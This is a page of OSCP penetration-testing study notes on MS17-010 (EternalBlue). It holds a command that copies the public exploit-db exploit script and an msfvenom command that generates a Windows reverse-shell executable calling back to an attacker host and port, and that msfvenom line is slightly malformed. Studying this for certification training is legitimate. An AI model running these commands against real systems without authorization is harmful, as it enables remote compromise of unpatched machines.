💻
oscp-study-notes
  • What is this?
  • Scanning & Enumeration
    • FTP 21
    • SMTP 25
    • HTTP/HTTPS 80/443/*
    • SMB 139/443
  • Vulnerabilites & Exploitation
    • Socket Programming
    • Generate shellcodes
    • Shellshock
    • Cross Compiling
    • LFI/RFI
    • SQL Injection
    • CVE2009-3103
    • MS17-010
  • Privilege Escalation
  • File Transfers
  • Buffer Overflow
  • Port Redirection and Tunneling
  • Password Cracking
  • Proof
  • Netcat
  • Third-party Tools
  • Bypass AV
  • Methodology
  • Writing a report
  • Further Reading
Powered by GitBook
On this page
  • EternalBlue (zzz_exploit.py)
  • Shellcode
  • References

Was this helpful?

  1. Vulnerabilites & Exploitation

MS17-010

PreviousCVE2009-3103NextPrivilege Escalation

Last updated 5 years ago

Was this helpful?

EternalBlue (zzz_exploit.py)

cp /usr/share/exploitdb/exploits/windows/remote/42315.py .

Shellcode

msfvenom -p windows/shell_reverse_tcp -f exe \
    -o reverse.exe
    LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT

References

https://github.com/worawit/MS17-010
https://medium.com/@sdgeek/hack-the-box-htb-blue-115b3f563125
https://www.reddit.com/r/oscp/comments/9mbarh/ms17010_for_all_os/